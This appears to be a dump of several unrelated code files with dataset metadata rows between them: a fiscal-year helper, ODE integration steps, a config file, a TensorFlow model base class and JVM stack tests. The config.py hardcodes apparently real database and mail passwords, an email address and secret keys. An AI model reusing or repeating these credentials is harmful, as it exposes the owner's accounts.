:exit_date_fill: a datetime.datetime object; default value of
July 1st, 2018
:fill_na: a boolean; default is True
"""
self.dataframe = dataframe
self.exit_date_fill_type = exit_date_fill_type
self.exit_fill = exit_date_fill
self.fill_na = fill_na
# a dictionary specifying months, years, and their associated ficsal
# year based upon the federal HUD FY
self.fiscal_years = fiscal_years = {
1: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
2: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
3: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
4: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
5: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
6: {
2000: "FY 99-00",
2001: "FY 00-01",
2002: "FY 01-02",
2003: "FY 02-03",
2004: "FY 03-04",
2005: "FY 04-05",
2006: "FY 05-06",
2007: "FY 06-07",
2008: "FY 07-08",
2009: "FY 08-09",
2010: "FY 09-10",
2011: "FY 10-11",
2012: "FY 11-12",
2013: "FY 12-13",
2014: "FY 13-14",
2015: "FY 14-15",
2016: "FY 15-16",
2017: "FY 16-17",
2018: "FY 17-18",
2019: "FY 18-19",
2020: "FY 19-20",
2021: "FY 20-21",
2022: "FY 21-22",
2023: "FY 22-23",
2024: "FY 23-24",
2025: "FY 24-25",
2026: "FY 25-26",
2027: "FY 26-27",
2028: "FY 27-28",
2029: "FY 28-29",
2030: "FY 29-30"
},
7: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
8: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
9: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
10: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
11: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
},
12: {
2000: "FY 00-01",
2001: "FY 01-02",
2002: "FY 02-03",
2003: "FY 03-04",
2004: "FY 04-05",
2005: "FY 05-06",
2006: "FY 06-07",
2007: "FY 07-08",
2008: "FY 08-09",
2009: "FY 09-10",
2010: "FY 10-11",
2011: "FY 11-12",
2012: "FY 12-13",
2013: "FY 13-14",
2014: "FY 14-15",
2015: "FY 15-16",
2016: "FY 16-17",
2017: "FY 17-18",
2018: "FY 18-19",
2019: "FY 19-20",
2020: "FY 20-21",
2021: "FY 21-22",
2022: "FY 22-23",
2023: "FY 23-24",
2024: "FY 24-25",
2025: "FY 25-26",
2026: "FY 26-27",
2027: "FY 27-28",
2028: "FY 28-29",
2029: "FY 29-30",
2030: "FY 30-31"
}
}
# a dictionary specifying months and their associated ficsal
# year based upon the federal HUD FY
self.quarters = {
1: "Q3",
2: "Q3",
3: "Q3",
4: "Q4",
5: "Q4",
6: "Q4",
7: "Q1",
8: "Q1",
9: "Q1",
10: "Q2",
11: "Q2",
12: "Q2"
}
def get_datetime_column_names(self):
"""
:return: A list of names of columns that contain the datetime64[ns] dtypes
"""
return self.dataframe.select_dtypes(
include=["datetime64[ns]"]
).columns.get_values().tolist()
def follow_fill_command(self):
"""
Fill the nan values in columns with dtypes of datetime64[ns]
:return: a pandas dataframe
"""
# make a local copy of the self.dataframe object
data = self.dataframe
# check the class parameters and fill the nan values in the datetime64[ns]
# columns appropriatly
if self.fill_na and (self.exit_date_fill_type == "today"):
for column in self.get_datetime_column_names():
data[column].fillna(datetime.today(), inplace=True)
elif self.fill_na and (self.exit_date_fill_type == "specify"):
for column in self.get_datetime_column_names():
data[column].fillna(self.exit_fill, inplace=True)
else:
pass
return data
def create_fy_q_columns(self):
"""
Create fiscal year and quarter columns for each of the datetime64[ns]
columns, then fill those columns with the appropriate quarter or fiscal
year.
:return: a pandas dataframe
"""
# make a local copy of the self.dataframe object
data = self.follow_fill_command()
# loop through the columns that have a dtype of datetime64[ns]
for name in self.get_datetime_column_names():
# create fiscal year and quarter columns for each relevant column
y_value = name + " Fiscal Year"
q_value = name + " Quarter"
# fill the fiscal year values
data[y_value] = [
self.fiscal_years[month][year] for (month, year) in list(
zip(
data[name].dt.month,
data[name].dt.year
)
)
]
# fill the quarter values
data[q_value] = [
self.quarters[month] for month in data[name].dt.month
]
return data
| 32.796477
| 84
| 0.350558
| 1,959
| 16,759
| 2.966309
| 0.100051
| 0.01239
| 0.01239
| 0.01652
| 0.740664
| 0.731027
| 0.726209
| 0.726209
| 0.712442
| 0.701084
| 0
| 0.377202
| 0.518945
| 16,759
| 510
| 85
| 32.860784
| 0.343587
| 0.078764
| 0
| 0.819172
| 0
| 0
| 0.199555
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008715
| false
| 0.002179
| 0.006536
| 0
| 0.023965
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
80ca87e299b82b703f0c50ea0ddc2236996d1d5f
| 6,356
|
py
|
Python
|
dvoc_model/integration_methods.py
|
TragerJoswig-Jones/dvoc_model
|
fb5d369096e436b2e4a518c4f16c3493e36aadfc
|
[
"MIT"
] | null | null | null |
dvoc_model/integration_methods.py
|
TragerJoswig-Jones/dvoc_model
|
fb5d369096e436b2e4a518c4f16c3493e36aadfc
|
[
"MIT"
] | null | null | null |
dvoc_model/integration_methods.py
|
TragerJoswig-Jones/dvoc_model
|
fb5d369096e436b2e4a518c4f16c3493e36aadfc
|
[
"MIT"
] | null | null | null |
import scipy.optimize
import numpy as np
""" Explicit Solvers """
# TODO: Make this equation modular / allow any number of components
def forward_euler_step(dt, components, set_states=True, update_states=False):
dxs = []
for component in components:
dxdt = component.dynamics()
dxs.append(dxdt * dt)
if set_states:
for component, dx in zip(components, dxs):
component.states[:,1] = component.states[:,0] + dx
if update_states:
for component in components:
component.step_states()
return dxs
def backward_euler_step(dt, components, set_states=True, update_states=False):
k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False) # Estimation Step
dxs = []
for component, k1 in zip(components, k1s):
dx2 = component.dynamics(component.states[:,0] + k1)
if set_states:
component.states[:,1] = component.states[:,0] + dx2 * dt
dxs.append(dx2 * dt)
if update_states:
for component in components:
component.step_states()
return dxs
# TODO: Update below here
def semi_implicit_euler_step(dt, components, set_states=True, update_states=False):
k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False) # Estimation Step
for k1 in k1s: k1[1] = 0 # Zero out step for v_beta / theta
dxs = []
for component, k1 in zip(components, k1s):
k2dt = component.dynamics(component.states[:,0] + k1)
k2dt[0] = 0
dx = k1 + k2dt * dt
if set_states:
component.states[:,1] = component.states[:,0] + dx
dxs.append(dx)
if update_states:
for component in components:
component.step_states()
return dxs
def rk2_step(dt, components, set_states=True, update_states=False):
k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False) # Estimation Step
dxs = []
for component, k1 in zip(components, k1s):
k2dt = component.dynamics(component.states[:,0] + k1)
dx = (k1 + k2dt * dt) * 0.5 # k1 already took dt into account
if set_states:
component.states[:,1] = component.states[:,0] + dx
dxs.append(dx)
if update_states:
for component in components:
component.step_states()
return dxs
def rk2_shift_step(dt, components, set_states=True, update_states=False):
k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False) # Estimation Step
dxs = []
for component, k1 in zip(components, k1s):
k2dt = component.dynamics(component.states[:,0] + k1)
dx = (k1 + k2dt * dt) * 0.5 # k1 already took dt into account
dx[0] += 0.008 * dt # TEST: Apply LTE diff error here
dx[1] -= 5e-5 * dt
if set_states:
component.states[:,1] = component.states[:,0] + dx
dxs.append(dx)
if update_states:
for component in components:
component.step_states()
return dxs
def euler_rk2_step(dt, components, set_states=True, update_states=False):
k1s = forward_euler_step(dt, components, set_states=set_states, update_states=False) # Estimation Step
dxs = []
for component, k1 in zip(components, k1s):
k2dt = component.dynamics(component.states[:,0] + k1)
k2dt[0] = k1[0] # First state uses forward euler
dx = (k1 + k2dt * dt) * 0.5 # k1 already took dt into account
if set_states:
component.states = component.states[:,0] + dx
dxs.append(dx)
if update_states:
for component in components:
component.step_states()
return dxs
def rk4_step(dt, components, set_states=True, update_states=False):
k1s = []
for component in components:
dxdt = component.dynamics(component.states[:,0])
k1s.append(dxdt)
k2s = []
for component, k1 in zip(components, k1s):
dxdt = component.dynamics(component.states[:,0] + k1 * dt / 2)
k2s.append(dxdt)
k3s = []
for component, k2 in zip(components, k2s):
dxdt = component.dynamics(component.states[:,0] + k2 * dt / 2)
k3s.append(dxdt)
k4s = []
for component, k3 in zip(components, k3s):
dxdt = component.dynamics(component.states[:,0] + k3 * dt)
k4s.append(dxdt)
dxs = []
for component, k1, k2, k3, k4 in zip(components, k1s, k2s, k3s, k4s):
dxdt = (k1 + 2 * k2 + 2 * k3 + k4) / 6
if set_states:
component.states[:,1] = component.states[:,0] + dxdt * dt
dxs.append(dxdt * dt)
if update_states:
for component in components:
component.step_states()
return dxs
""" Implicit Solvers """
def tustin_step(dt, components, set_states=True, update_states=False):
dxs = []
for component in components:
x0 = component.states[:,0]
x1 = component.tustin_step(x=x0)
if set_states:
component.states[:,1] = x1 # step states
dxs.append(x1 - x0)
if update_states:
for component in components:
component.step_states()
return dxs
def backward_step(dt, components, set_states=True, update_states=False):
dxs = []
for component in components:
x0 = component.states[:,0]
x1 = component.backward_step(x=x0)
if set_states:
component.states[:,1] = x1 # step states
dxs.append(x1 - x0)
if update_states:
for component in components:
component.step_states()
return dxs
"""
# NUMBAKIT ODE SOLVERS
# TODO: Not working as dvoc_model framework is based around objects
# Would need to have independent dynamic function for the whole system,
# without relying on classes.
def nbkode_step(dt, components, set_states=True, update_states=False):
dxs = []
for component in components:
x0 = component.states[:,0]
solver = nbkode.ForwardEuler(component.dynamics, 0.0, x0)
ts, xs = solver.run([0, dt])
x1 = xs[-1]
dxs.append(x1 - x0)
if set_states:
for component, dx in zip(components, dxs):
component.states[:,1] = component.states[:,0] + dx
if update_states:
for component in components:
component.step_states()
return dxs
"""
| 33.989305
| 107
| 0.625551
| 830
| 6,356
| 4.675904
| 0.140964
| 0.06957
| 0.082453
| 0.073435
| 0.803659
| 0.793095
| 0.750837
| 0.723783
| 0.723783
| 0.701623
| 0
| 0.032569
| 0.265733
| 6,356
| 186
| 108
| 34.172043
| 0.799014
| 0.060573
| 0
| 0.686567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010753
| 0
| 1
| 0.067164
| false
| 0
| 0.014925
| 0
| 0.149254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80d02367c373abe957de9ff3a027d963439013d9
| 2,544
|
py
|
Python
|
config.py
|
vzer/vzer-gitlab
|
fc70b5450f219530550f84d5f135259b439e0e79
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
vzer/vzer-gitlab
|
fc70b5450f219530550f84d5f135259b439e0e79
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
vzer/vzer-gitlab
|
fc70b5450f219530550f84d5f135259b439e0e79
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#coding=utf-8
__author__ = 'vzer'
class Base_Config(object):
#app config
SECRET_KEY=""
POST_PRE_PAGE=6
REGISTERCODE=""
DEBUG = True
#mysql config
MYSQL_DB = ""
MYSQL_USER = ""
MYSQL_PASS = ""
MYSQL_HOST = ""
MYSQL_PORT =0
SQLALCHEMY_DATABASE_URI = 'mysql://%s:%s@%s:%s/%s' \
% (MYSQL_USER, MYSQL_PASS,
MYSQL_HOST, MYSQL_PORT, MYSQL_DB)
SQLALCHEMY_ECHO=True
#mail config
ADMINS = []
MAIL_SERVER = u''
MAIL_USERNAME = u''
MAIL_PASSWORD = u''
DEFAULT_MAIL_SENDER = u''
MAIL_USE_TLS=False
MAIL_USE_SSL=False
#log config
DEBUG_LOG = 'logs/debug.log'
ERROR_LOG = 'logs/error.log'
class Dev_Config(Base_Config):
#app config
SECRET_KEY="vzer_blog_1589"
POST_PRE_PAGE=6
REGISTERCODE="cheurbim_1589"
DEBUG = True
#mysql config
MYSQL_DB = "vzerblog"
MYSQL_USER = "vzer"
MYSQL_PASS = "wwwlin123"
MYSQL_HOST = "192.168.1.246"
MYSQL_PORT = int("3306")
SQLALCHEMY_DATABASE_URI = 'mysql://%s:%s@%s:%s/%s' \
% (MYSQL_USER, MYSQL_PASS,
MYSQL_HOST, MYSQL_PORT, MYSQL_DB)
SQLALCHEMY_ECHO=True
SQLALCHEMY_TRACK_MODIFICATIONS=True
#mail config
ADMINS = ["zhangcunlei@xiniunet.com",]
MAIL_SERVER = u'smtp.xiniunet.com'
MAIL_USERNAME = u'zhangcunlei@xiniunet.com'
MAIL_PASSWORD = u'wwwlin123!'
DEFAULT_MAIL_SENDER = u'zhangcunlei@xiniunet.com'
MAIL_USE_TLS=False
MAIL_USE_SSL=False
#log config
DEBUG_LOG = 'logs/debug.log'
ERROR_LOG = 'logs/error.log'
class Pro_Config(Base_Config):
#app config
SECRET_KEY="vzer_blog_1589"
POST_PRE_PAGE=6
REGISTERCODE="cheurbim_1589"
DEBUG = False
#mysql config
MYSQL_DB = "vzerblog"
MYSQL_USER = "vzer"
MYSQL_PASS = "wwwlin123"
MYSQL_HOST = "192.168.1.246"
MYSQL_PORT = int("3306")
SQLALCHEMY_DATABASE_URI = 'mysql://%s:%s@%s:%s/%s' \
% (MYSQL_USER, MYSQL_PASS,
MYSQL_HOST, MYSQL_PORT, MYSQL_DB)
SQLALCHEMY_ECHO=True
#mail config
ADMINS = ["zhangcunlei@xiniunet.com",]
MAIL_SERVER = u'smtp.xiniunet.com'
MAIL_USERNAME = u'zhangcunlei@xiniunet.com'
MAIL_PASSWORD = u'wwwlin123!'
DEFAULT_MAIL_SENDER = u'zhangcunlei@xiniunet.com'
MAIL_USE_TLS=False
MAIL_USE_SSL=False
#log config
DEBUG_LOG = 'logs/debug.log'
ERROR_LOG = 'logs/error.log'
| 24.461538
| 62
| 0.621462
| 325
| 2,544
| 4.563077
| 0.212308
| 0.016183
| 0.018206
| 0.016183
| 0.886042
| 0.869858
| 0.848955
| 0.848955
| 0.82468
| 0.82468
| 0
| 0.032655
| 0.265723
| 2,544
| 104
| 63
| 24.461538
| 0.761242
| 0.063286
| 0
| 0.746479
| 0
| 0
| 0.203376
| 0.088608
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.126761
| 0
| 0
| 0.901408
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
80e35556976bfb273b98ba7157d593f53ba63267
| 2,768
|
py
|
Python
|
proj/model/base_model.py
|
NanYoMy/mmregnet
|
50909d39289733264dce14666e9deeecbe858819
|
[
"Apache-2.0"
] | 7
|
2021-05-18T05:21:41.000Z
|
2022-01-03T07:03:35.000Z
|
proj/model/base_model.py
|
NanYoMy/mmregnet
|
50909d39289733264dce14666e9deeecbe858819
|
[
"Apache-2.0"
] | null | null | null |
proj/model/base_model.py
|
NanYoMy/mmregnet
|
50909d39289733264dce14666e9deeecbe858819
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import numpy as np
from logger.Logger import getLoggerV3
import os
from evaluate.metric import cross_validate
from excelutil.output2excel import read_excel,outpu2excel
class BaseModel():
def __init__(self,sess,args):
self.sess=sess
self.args=args
self.name=self.__class__.__name__
self.logger=getLoggerV3(self.name,self.args.log_dir)
def save(self, checkpoint_dir, step):
model_name = os.path.basename(self.args.dataset_dir)+".model"
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir,id=None):
# model_dir = "%s_%s" % (self.args.dataset_dir, self.args.image_size)
# checkpoint_dir = (checkpoint_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
print(" [*] Reading checkpoint...%s"%ckpt)
if ckpt and ckpt.model_checkpoint_path:
if id is not None:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)+str(id)
else:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
# class CrossValidateionBaseModel(BaseModel):
#
# def cross_validate(self):
class BaseModelV2():
def __init__(self,sess,args):
self.sess=sess
self.args=args
self.name=self.__class__.__name__
self.logger=getLoggerV3(self.name,self.args.log_dir)
def save(self, checkpoint_dir, step):
model_name='model'
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir,id=None):
# model_dir = "%s_%s" % (self.args.dataset_dir, self.args.image_size)
# checkpoint_dir = (checkpoint_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
print(" [*] Reading checkpoint...%s"%ckpt)
if ckpt and ckpt.model_checkpoint_path:
if id is not None:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)+str(id)
else:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
# class CrossValidateionBaseModel(BaseModel):
#
# def cross_validate(self):
| 32.564706
| 82
| 0.634032
| 345
| 2,768
| 4.84058
| 0.188406
| 0.14012
| 0.068263
| 0.082635
| 0.864671
| 0.864671
| 0.864671
| 0.864671
| 0.864671
| 0.864671
| 0
| 0.002948
| 0.264812
| 2,768
| 84
| 83
| 32.952381
| 0.81769
| 0.126806
| 0
| 0.821429
| 0
| 0
| 0.02787
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.107143
| 0
| 0.321429
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03822fb437f1ef9c064553f063642176b45fb31d
| 63,054
|
py
|
Python
|
tests/stack/test_stack_modification.py
|
GiantTreeLP/porth-jvm
|
08cfe53fe54430ddcf82fdf40b33f2e34126201c
|
[
"MIT"
] | null | null | null |
tests/stack/test_stack_modification.py
|
GiantTreeLP/porth-jvm
|
08cfe53fe54430ddcf82fdf40b33f2e34126201c
|
[
"MIT"
] | null | null | null |
tests/stack/test_stack_modification.py
|
GiantTreeLP/porth-jvm
|
08cfe53fe54430ddcf82fdf40b33f2e34126201c
|
[
"MIT"
] | null | null | null |
from jawa.assemble import Label
from jawa.attributes.bootstrap import BootstrapMethod, BootstrapMethodsAttribute
from jawa.constants import MethodHandleKind
from extensions.DeduplicatingClassFile import DeduplicatingClassFile
from jvm.intrinsics import OperandType
from jvm.intrinsics.stack import Stack
cf = DeduplicatingClassFile.create("Test")
cf.attributes.create(BootstrapMethodsAttribute)
def test_aaload():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[0] == OperandType.Reference
assert stack._stack[1] == OperandType.Integer
stack.update_stack("aaload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_aastore():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[0] == OperandType.Reference
assert stack._stack[1] == OperandType.Integer
stack.update_stack("ldc", cf.constants.create_string("Hello, World!"))
assert len(stack._stack) == 3
assert stack._stack[0] == OperandType.Reference
assert stack._stack[1] == OperandType.Integer
assert stack._stack[2] == OperandType.Reference
stack.update_stack("aastore")
assert len(stack._stack) == 0
def test_aconst_null():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_aload():
stack = Stack()
stack.update_stack("aload")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack = Stack()
stack.update_stack("aload_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack = Stack()
stack.update_stack("aload_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack = Stack()
stack.update_stack("aload_2")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack = Stack()
stack.update_stack("aload_3")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_anewarray():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
def test_areturn():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("areturn")
assert len(stack._stack) == 0
def test_arraylength():
stack = Stack()
stack.update_stack("iconst_1")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
stack.update_stack("anewarray", cf.constants.create_class("java/lang/String"), 1)
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("arraylength")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Integer
def test_astore():
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("astore")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("astore_0")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("astore_1")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
stack.update_stack("astore_2")
assert len(stack._stack) == 0
stack = Stack()
stack.update_stack("aconst_null")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Reference
